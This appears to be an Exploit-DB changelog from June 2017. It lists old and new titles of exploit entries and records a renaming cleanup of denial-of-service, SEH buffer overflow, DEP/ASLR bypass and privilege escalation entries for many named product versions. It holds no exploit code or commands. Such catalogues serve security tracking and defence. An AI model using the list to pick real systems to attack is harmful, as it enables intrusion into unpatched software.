DB: 2017-06-14

7 new exploits

MyServer 0.7.1 - (POST) Denial of Service
MyServer 0.7.1 - 'POST' Denial of Service

Foxmail 2.0 - (MAIL FROM:) Denial of Service
Foxmail 2.0 - 'MAIL FROM:' Denial of Service

Nokia Symbian 60 - (BlueTooth Nickname) Remote Restart (2)
Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)
Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service
Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service
Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service
Tcpdump 3.8.x/3.9.1 - (isis_print) Infinite Loop Denial of Service
Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service
Tcpdump 3.8.x - 'ldp_print' Infinite Loop Denial of Service
Tcpdump 3.8.x - 'rt_routing_info' Infinite Loop Denial of Service
Tcpdump 3.8.x/3.9.1 - 'isis_print' Infinite Loop Denial of Service

Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service
Ethereal 0.10.10 - 'dissect_ipc_state' Remote Denial of Service
phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)
phpBB 2.0.15 - Register Multiple Users Denial of Service (C)
phpBB 2.0.15 - Register Multiple Users (Denial of Service) (Perl)
phpBB 2.0.15 - Register Multiple Users (Denial of Service) (C)

Stream / Raped (Windows) - Denial of Service Attack
Stream / Raped (Windows) - Denial of Service
Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow
Mercury/32 Mail Server 4.01a - (check) Buffer Overflow
Golden FTP Server Pro 2.52 - (USER) Remote Buffer Overflow
Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
Golden FTP Server Pro 2.52 - 'USER' Remote Buffer Overflow
Inframail Advantage Server Edition 6.0 < 6.37 - (SMTP) Buffer Overflow
Inframail Advantage Server Edition 6.0 < 6.37 - (FTP) Buffer Overflow
GTChat 0.95 Alpha - (adduser) Remote Denial of Service
Inframail Advantage Server Edition 6.0 < 6.37 - 'SMTP' Buffer Overflow
Inframail Advantage Server Edition 6.0 < 6.37 - 'FTP' Buffer Overflow
GTChat 0.95 Alpha - 'adduser' Remote Denial of Service

P2P Pro 1.0 - (command) Denial of Service
P2P Pro 1.0 - 'command' Denial of Service

Mozilla Products - (Host:) Buffer Overflow Denial of Service String
Mozilla Products - 'Host:' Buffer Overflow Denial of Service String

Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service
Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service

RBExplorer 1.0 - (Hijacking Command) Denial of Service
RBExplorer 1.0 - Hijacking Command Denial of Service

Freeciv 2.0.7 - (Jumbo Malloc) Denial of Service Crash
Freeciv 2.0.7 - (Jumbo Malloc) Crash (Denial of Service)
XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)
XChat 2.6.7 - (Windows) Remote Denial of Service (Perl)
XChat 2.6.7 (Windows) - Remote Denial of Service (PHP)
XChat 2.6.7 (Windows) - Remote Denial of Service (Perl)

Nokia Symbian 60 3rd Edition - Browser Denial of Service Crash
Nokia Symbian 60 3rd Edition - Browser Crash (Denial of Service)

Macromedia Flash 9 - (IE Plugin) Remote Denial of Service Crash
Macromedia Flash 9 - (IE Plugin) Remote Crash (Denial of Service)

AIDeX Mini-WebServer 1.1 - Remote Denial of Service Crash
AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)

Microsoft Windows - NtRaiseHardError 'Csrss.exe/winsrv.dll' Double-Free
Microsoft Windows - 'Csrss.exe/winsrv.dll' NtRaiseHardError Double-Free

Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash
Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Hang / Crash (Denial of Service)

Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam)
Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service

AyeView 2.20 - (malformed gif image) Local Crash
AyeView 2.20 - Malformed .GIF Image Local Crash

Microsoft Windows - '.chm' Denial of Service (HTML compiled)
Microsoft Windows - '.chm' Denial of Service (HTML Compiled)

Winamp 5.541 - '.mp3'/'.aiff' Multiple Denial of Services
Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities

Multiple HTTP Server - Low Bandwidth Denial of Service (slowloris.pl)
Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service

Google Picasa 3.5 - Local Denial of Service Buffer Overflow
Google Picasa 3.5 - Local Buffer Overflow (Denial of Service)

3Com OfficeConnect Routers - (Content-Type) Denial of Service
3Com OfficeConnect Routers - 'Content-Type' Denial of Service

VSO Medoa Player 1.0.2.2 - Local Denial of Services (PoC)
VSO Medoa Player 1.0.2.2 - Local Denial of Service (PoC)

QtWeb 3.0 - Remote Denial of Service/Crash
QtWeb 3.0 - Remote Crash (Denial of Service)

NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)
NovaPlayer 1.0 - '.mp3' File Local Denial of Service (2)

Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' Denial of Service/Crash
Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)

eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash (SEH) (PoC)

Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Denial of Service (Crash)
Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)

Optimal Archive 1.38 - '.zip' SEH (PoC)
Optimal Archive 1.38 - '.zip' File (SEH) (PoC)
MovieLibrary 1.4.401 - Local Denial of Service (.dmv)
Book Library 1.4.162 - Local Denial of Service (.bkd)
MovieLibrary 1.4.401 - '.dmv' Local Denial of Service
Book Library 1.4.162 - '.bkd' Local Denial of Service

Huawei EchoLife HG520c - Denial of Service / Modem Reset
Huawei EchoLife HG520c - Modem Reset (Denial of Service)

CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)
CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)

QtWeb 3.3 - Remote Denial of Service/Crash
QtWeb 3.3 - Remote Crash (Denial of Service)

Subtitle Translation Wizard 3.0.0 - SEH (PoC)
Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)

Opera - Denial of Service by canvas Element
Opera - Canvas Element (Denial of Service)

Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)

HP Data Protector Manager 6.11 - Remote Denial of Service in RDS Service
HP Data Protector Manager 6.11 - RDS Service Remote Denial of Service

FreeBSD 8.0 - Local Denial of Service (Forced Reboot)
FreeBSD 8.0 - Local Forced Reboot (Denial of Service)

Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile
Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)

CiscoKits 1.0 - TFTP Server Denial of Service (Write command)
CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service

Apache - Remote Denial of Service (Memory Exhaustion)
Apache - Remote Memory Exhaustion (Denial of Service)

TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)
TOWeb 3.0 - Local Format String Denial of Service 'TOWeb.MO' File Corruption

BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities
BlueZone Desktop Multiple - Malformed Files Local Denial of Service Vulnerabilities

NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]
NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)

Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)
Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)

Qutecom SoftPhone 2.2.1 - Heap Overflow Denial of Service/Crash (PoC)
Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)

Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack
Network Associates Gauntlet Firewall 5.0 - Denial of Service
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (1)
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - Services.exe Denial of Service (2)
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (1)
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 - 'Services.exe' Denial of Service (2)

Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service Attack
Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service

Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack
Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service

(Linux Kernel) ReiserFS 3.5.28 - Denial of Service (Possible Code Execution)
(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service

Winlog Lite SCADA HMI system - SEH 0verwrite
Winlog Lite SCADA HMI system - (SEH) Overwrite

FL Studio 10 Producer Edition - SEH Based Buffer Overflow (PoC)
FL Studio 10 Producer Edition - (SEH) Buffer Overflow (PoC)

OptiSoft Blubster 2.5 - Remote Denial of Service Attack
OptiSoft Blubster 2.5 - Remote Denial of Service

ChatZilla 0.8.23 - Remote Denial of Service Attack
ChatZilla 0.8.23 - Remote Denial of Service

ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities
ACDSee 9.0 Photo Manager - Multiple '.BMP' Denial of Service Vulnerabilities

Motorola SBG6580 Cable Modem & Wireless Router - Denial of Service Reboot
Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)

Unreal Tournament 3 - Denial of Service / Memory Corruption
Unreal Tournament 3 - Memory Corruption (Denial of Service)

Gold MP4 Player 3.3 - Universal SEH Exploit (Metasploit)
Gold MP4 Player 3.3 - Universal Exploit (SEH) (Metasploit)

Jzip - SEH Unicode Buffer Overflow (Denial of Service)
Jzip - Buffer Overflow (SEH Unicode) (Denial of Service)

Symantec Endpoint Protection Manager 12.1.x - SEH Overflow (PoC)
Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)

Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Issue
Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities

NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary memory read
NovaSTOR NovaNET 11.0 - Remote Denial of Service / Arbitrary Memory Read

Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' Buffer Overflow/Denial of Service EIP Overwrite
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - '.wax' File Buffer Overflow / Denial of Service EIP Overwrite

JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)
JourneyMap 5.0.0RC2 Ultimate Edition - Resource Consumption (Denial of Service)

Mediacoder 0.8.33 build 5680 - Buffer Overflow (SEH) Denial of Service (.lst)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service

i.FTP 2.21 - SEH Overflow Crash (PoC)
i.FTP 2.21 - (SEH) Overflow Crash (PoC)

Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)
Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' File Crush Application (Denial of Service)

Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)
Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)

Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service/Elevation of Privilege (MS15-111)
Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)

Sam Spade 1.14 - S-Lang Command Field SEH Overflow
Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)

SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow
SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)

Network Scanner 4.0.0.0 - SEH Crash (PoC)
Network Scanner 4.0.0.0 - (SEH)Crash (PoC)

Zortam Mp3 Media Studio 20.15 - SEH Overflow Denial of Service
Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service

i.FTP 2.21 - Host Address / URL Field SEH Exploit
i.FTP 2.21 - Host Address / URL Field (SEH)

Oracle VirtualBox Guest Additions 5.1.18 -  Unprivileged Windows User-Mode Guest Code Double-Free
Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free
LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free
LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing
LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking

Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)
Microsoft Windows Server 2000 - Utility Manager Privilege Escalation (MS04-019)

Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit
Microsoft Windows - 'keybd_event' Local Privilege Escalation

Microsoft Vista - (NtRaiseHardError) Privilege Escalation
Microsoft Vista - 'NtRaiseHardError' Privilege Escalation

Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation
Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Escalation

eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit
eTrust AntiVirus Agent r8 - Local Privilege Escalation

WinPcap 4.0 - 'NPF.SYS' Privilege Elevation (PoC)
WinPcap 4.0 - 'NPF.SYS' Privilege Escalation (PoC)

IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow
IntelliTamper (2.07/2.08) - Language Catalog Overflow (SEH)

WINMOD 1.4 - '.lst' Local Stack Overflow XP SP3 (RET + SEH) (3)
WINMOD 1.4 - '.lst' File Local Stack Overflow XP SP3 (RET + SEH) (3)

CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow
CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)

DJ Studio Pro 5.1.6.5.2 - SEH Exploit
DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit

Winamp 5.572 - SEH Exploit
Winamp 5.572 - (SEH) Exploit

Orbital Viewer 1.04 - '.orb' Local Universal SEH Overflow
Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)

ZipScan 2.2c - SEH Exploit
ZipScan 2.2c - (SEH) Exploit
ZipCentral - '.zip' SEH Exploit
eZip Wizard 3.0 - '.zip' SEH Exploit
ZipCentral - '.zip' File (SEH)
eZip Wizard 3.0 - '.zip' File (SEH)

PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)
PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)

Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)
Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)

ZipWrangler 1.20 - '.zip' SEH Exploit
ZipWrangler 1.20 - '.zip' File (SEH)

Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit
Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' File (SEH)

Mediacoder 0.7.3.4672 - SEH Exploit
Mediacoder 0.7.3.4672 - (SEH) Exploit

VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (1)
VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)

Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP Bypass
Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass
BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)
BlazeDVD 5.1 - '.plf' File Stack Buffer Overflow (PoC) (Windows 7 ASLR + DEP Bypass)
Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)

BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow
BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow

RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR + DEP Bypass)
RM Downloader 3.1.3 (Windows 7) - Local ASLR + DEP Bypass (SEH)

ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)
ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)

A-PDF WAV to MP3 1.0.0 - Universal Local SEH Exploit
A-PDF WAV to MP3 1.0.0 - Universal Local (SEH)

Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit
Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)

MP3 Workstation 9.2.1.1.2 - SEH Exploit
MP3 Workstation 9.2.1.1.2 - (SEH) Exploit
DJ Studio Pro 8.1.3.2.1 - SEH Exploit
A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit
DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit
A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)

MP3 Workstation 9.2.1.1.2 - SEH Exploit (Metasploit)
MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)

iworkstation 9.3.2.1.4 - SEH Exploit
iworkstation 9.3.2.1.4 - (SEH) Exploit
Quick Player 1.3 - Unicode SEH Exploit
AudioTran 1.4.2.4 - SafeSEH + SEHOP Exploit
Quick Player 1.3 - Unicode (SEH)
AudioTran 1.4.2.4 - (SafeSEH + SEHOP) Exploit

Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)
Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)

Nokia MultiMedia Player 1.0 - SEH Unicode Exploit
Nokia MultiMedia Player 1.0 - (SEH Unicode)

WM Downloader 3.1.2.2 2010.04.15 - '.m3u' Buffer Overflow (DEP Bypass)
WM Downloader 3.1.2.2 2010.04.15 - '.m3u' File Buffer Overflow (DEP Bypass)

Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)
Adobe PDF - Escape EXE Social Engineering (No JavaScript) (Metasploit)

POP Peeper 3.7 - SEH Exploit
POP Peeper 3.7 - (SEH) Exploit

MPlayer Lite r33064 - '.m3u' SEH Overflow
MPlayer Lite r33064 - '.m3u' Overflow (SEH)

Wireshark 1.4.1 < 1.4.4 - SEH Overflow
Wireshark 1.4.1 < 1.4.4 - Overflow (SEH)

Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow
Subtitle Processor 7.7.1 - Buffer Overflow (SEH Unicode)

Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow (Metasploit)
Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)

The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows XP SP3 DEP Bypass)
The KMPlayer 3.0.0.1440 - '.mp3' File Buffer Overflow (Windows XP SP3 DEP Bypass)

MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)
MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)

DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass Exploit
DVD X Player 5.5 Pro - SEH + ASLR + DEP Bypass

MY MP3 Player 3.0 - '.m3u' Exploit DEP Bypass
MY MP3 Player 3.0 - '.m3u' DEP Bypass

TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion
TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion

DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)
DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)

BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass
BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)

Corel Linux OS 1.0 - Denial of Serviceemu Distribution Configuration
Corel Linux OS 1.0 - Dosemu Distribution Configuration

MyMp3 Player Stack - '.m3u' DEP Bypass
MyMp3 Player Stack - '.m3u' File DEP Bypass

CoolPlayer+ Portable 2.19.2 - Buffer Overflow ASLR Bypass (Large Shellcode)
CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)
Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Elevation
Microsoft IIS 5.0 - In-Process Table Privilege Elevation
Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Escalation
Microsoft IIS 5.0 - In-Process Table Privilege Escalation

Taylor UUCP 1.0.6 - Argument Handling Privilege Elevation
Taylor UUCP 1.0.6 - Argument Handling Privilege Escalation

Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Elevation
Microsoft Windows NT 4.0/2000 - Process Handle Local Privilege Escalation

Huawei Technologies Internet Mobile - Unicode SEH Exploit
Huawei Technologies Internet Mobile - Unicode (SEH)

MySQL (Linux) - Database Privilege Elevation Exploit
MySQL (Linux) - Database Privilege Escalation

Man Utility 2.3.19 - Local Compression Program Privilege Elevation
Man Utility 2.3.19 - Local Compression Program Privilege Escalation

BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)
BlazeDVD 6.1 - PLF Exploit (DEP + ASLR Bypass) (Metasploit)

BOINC Manager (Seti@home) 7.0.64 - Field SEH based Buffer Overflow
BOINC Manager (Seti@home) 7.0.64 - Field Buffer Overflow (SEH)

Static HTTP Server 1.0 - SEH Overflow
Static HTTP Server 1.0 - (SEH) Overflow

ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)
ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)

VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (2)
VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)

Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass
Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass)

OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege
OpenVPN Private Tunnel Core Service - Unquoted Service Path Privilege Escalation

Nidesoft MP3 Converter 2.6.18 - SEH Local Buffer Overflow
Nidesoft MP3 Converter 2.6.18 - Local Buffer Overflow (SEH)

Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege
Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation

Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege
Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation
Quick Search 1.1.0.189 - 'search textbox' Unicode SEH Egghunter Buffer Overflow
Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow
Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)
Quick Search 1.1.0.189 - 'search textbox Buffer Overflow (Unicode SEH) (Egghunter)
Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)
Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH) (Windows 7 DEP Bypass)

Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow
Microsoft HTML Help Compiler 4.74.8702.0 - Overflow (SEH)

MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' SEH Based Buffer Overflow (ASLR & SAFESEH Bypass)
MASM321 11 Quick Editor - '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)

Mozilla - Maintenance Service Log File Overwrite Elevation of Privilege
Mozilla - Maintenance Service Log File Overwrite Privilege Escalation

Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow
Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow
Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH)
KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)
KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)
KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)
KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)

Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit
Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation

Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit
Internet Download Manager 6.25 Build 14 - 'Find file' Unicode (SEH)

Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege
Cogent Datahub 7.3.9 Gamma Script - Privilege Escalation

Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)
Easy RM to MP3 Converter 2.7.3.700 - '.m3u' File Exploit (Universal ASLR + DEP Bypass)

Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)
Tomabo MP4 Player 3.11.6 - Stack Overflow (SEH) (Metasploit)
Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit
CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)
Mediacoder 0.8.43.5852 - '.m3u' (SEH)
CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)

VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)
VUPlayer 2.49 - '.pls' File Stack Buffer Overflow (DEP Bypass)

Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege
Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation

Network Scanner 4.0.0 - SEH Local Buffer Overflow
Network Scanner 4.0.0 - Local Buffer Overflow (SEH)

Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow

Microsoft Windows - '.ani' GDI Remote Elevation of Privilege Exploit (MS07-017)
Microsoft Windows - '.ani' GDI Remote Privilege Escalation (MS07-017)

Move Networks Quantum Streaming Player - SEH Overflow
Move Networks Quantum Streaming Player - Overflow (SEH)

Quick TFTP Server Pro 2.1 - Remote SEH Overflow
Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)

Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit
Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation

FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow

PowerTCP FTP module - Multiple Technique Exploit (SEH/HeapSpray)
PowerTCP FTP module - Multiple Technique Exploit (SEH HeapSpray)

BigAnt Server 2.52 - SEH Exploit
BigAnt Server 2.52 - (SEH) Exploit

File Sharing Wizard 1.5.0 - SEH Exploit
File Sharing Wizard 1.5.0 - (SEH) Exploit

Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)
Kolibri 2.0 - (HEAD) Buffer Overflow RET + (SEH)

Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)
Easy File Sharing HTTP Server 7.2 - Overflow (SEH) (Metasploit)

WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)
WorldMail IMAPd 3.0 - Overflow (SEH) (Egg Hunter)

Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit
Sysax Multi Server 5.53 - SFTP Authenticated (SEH)

Simple Web Server 2.2-rc2 - ASLR Bypass Exploit
Simple Web Server 2.2-rc2 - ASLR Bypass

Microsoft SQL 2000/7.0 - Agent Jobs Privilege Elevation
Microsoft SQL 2000/7.0 - Agent Jobs Privilege Escalation

BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP Bypass)
BigAnt Server 2.52 SP5 - (SEH) Stack Overflow ROP-Based Exploit (ASLR + DEP Bypass)

Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution
Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)

Apache suEXEC - Privilege Elevation / Information Disclosure
Apache suEXEC - Information Disclosure / Privilege Escalation

Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)
Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit)

Kolibri Web Server 2.0 - GET Request SEH Exploit
Kolibri Web Server 2.0 - GET Request (SEH)

Microsoft Windows Kerberos - Elevation of Privilege (MS14-068)
Microsoft Windows Kerberos - Privilege Escalation (MS14-068)

X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)
X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass

i.FTP 2.21 - Time Field SEH Exploit
i.FTP 2.21 - Time Field (SEH)

Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow (Metasploit)
Konica Minolta FTP Utility 1.00 - Authenticated CWD Command Overflow (SEH) (Metasploit)

Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow
Easy File Sharing Web Server 7.2 - Remote Overflow (SEH)

Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow
Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)

Sysax Multi Server 6.50 - HTTP File Share SEH Overflow Remote Code Execution
Sysax Multi Server 6.50 - HTTP File Share Overflow (SEH) Remote Code Execution (SEH)

